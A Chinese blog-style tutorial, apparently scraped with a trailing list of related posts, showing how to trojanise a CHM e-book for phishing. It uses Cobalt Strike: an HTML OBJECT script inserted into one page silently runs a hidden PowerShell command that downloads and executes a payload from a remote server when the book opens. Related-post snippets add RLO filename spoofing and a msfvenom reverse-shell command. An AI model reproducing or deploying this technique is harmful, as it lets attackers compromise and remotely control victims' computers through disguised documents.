钓鱼篇-CHM电子书上线CS
1.对CS进行设置
服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码
2.对当前.CHM电子书进行解压
进入文件后选择任意文件夹进入
3.这里演示:进入-设备管理-打开setleds.html
4.把CS生成的利用代码插入到body里面去
利用代码:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:88/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
5. 插入完成后利用Easy CHM对解压后的电子书文件进行重新打包
6.新建-工程目录(电子书解压后的文件目录)-确定-点击编译-设置CHM保存
7.最后点击生成
8.下面打开电子书,看下CS会不会上线-成功上线
钓鱼篇-CHM电子书上线CS相关推荐
- 钓鱼篇-利用快捷方式上线CS
这里会用到windows中的mshta,用于执行hta文件 mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记 ...
- 钓鱼篇-利用RLO隐藏exe文件捆绑office免杀-远程模板加载上线CS
RLO伪装图片执行 利用msf生成木马x.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 ...
- 【内网渗透】利用非常规手段突破安全策略上线CS
前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...
- 【红队APT】钓鱼篇Office-CVE漏洞RLO隐藏压缩包释放免杀打包捆绑
文章目录 文件后缀-钓鱼伪装-RLO 压缩文件-自解压-释放执行 Office套件-CVE漏洞-MSF&CS Microsoft MSDT CVE-2022-30190 代码执行 Micros ...
- 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)
** 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五) ** 作者:大余 时间:2020-12-17 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录 ...
- 建站四部曲之前端显示篇(React+上线)
本系列分为四篇: 建站四部曲之后端接口篇(SpringBoot+上线) 建站四部曲之Python数据爬虫篇(selenium) 建站四部曲之前端显示篇(React+上线) 建站四部曲之移动端篇(And ...
- Android 中文API合集(4)(102篇)(chm格式)
前言 Android中文翻译组 , Android 中文chm , Android 中文pdf , android 中文 api Android中文翻译组第四个chm格式合集,收集整理102篇译文制作 ...
- 漏洞复现:通过CVE-2022-30190上线CS
免责声明:本文章仅供学习和研究使用,严禁使用该文章内容对互联网资产进行任何未授权的非法操作!若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守 ...
- 批处理+Linux书籍+黑客编程+脚本攻防+逆向工程书籍+海量资源(pdf+chm电子书)
TOOLS论坛内部文章打包.CHM http://yunfile.com/file/yunkey/0955157e/ 精通脚本黑客 http://yunfile.com/file/yunkey/636 ...
- CHM电子书反向编译器及注册机
CHM电子书反向编译器是一款专门用来反编译CHM电子书源文件的工具软件,可以迅速地释放包括在CHM电子书里面的全部源文件(包括网页.文本.图片.CHM.ZIP.EXE等全部源文件),并且完美地恢复源文 ...
最新文章
- Admin注册和路由分发详解
- Mac下Selenium无法最大化Chrome解决方案
- python 日历_python中的日历和时间
- USACO SEC.1.2 No.4 Palindromic Squares
- Ecplise中的Maven项目提示找不到jar包
- 爬虫-urlencode与parse_qs函数
- autoline 手册
- 阻塞非阻塞,同步异步四种I/O方式
- 【软件-ACDSee】图像合并为TIFF
- python在冒号处显示语法错误_python中的语法错误
- 一生要看的50部经典电影
- HDFS与HBASE的动态节点的扩容(增删)小白级(二)
- css3的animation动画属性实现闹钟左右摇摆
- 关于直播的iOS开发
- 这是你不曾见过的最全的ASO应用市场优化方式(中篇)
- JAVA中关于可变和不可变类型的理解
- synchronized关键字
- Jaeger-分布式调用链跟踪系统理论与实战
- 微信小程序云开发——有数据却拿不到数据
- 出海商家涌向东南亚,先行一步的跨境MCN是引流捷径吗?
热门文章
- java lob_oracle数值类型--LOB类型
- oracle dbms_lob trim,Oracle - DBMS_LOB函数和用法
- 模拟实现库函数之字符串函数
- 【快乐离散数学】谓词与量词 | 嵌套量词 | 狄摩根定律 | Predicates and Quantifiers | Nested Quantifiers
- iOS--相册视频MOV转MP4
- 场景设计题 汇总 (一)
- 计算机DVD驱动禁用怎么恢复,设备管理器中找不到dvd驱动器 怎么恢复 - 驱动管家...
- FMI飞马网【线上直播】京东POP接口自动化测试
- 关于计算机教学的论文,关于计算机教学论文.docx
- 怎么把视频复制到IPAD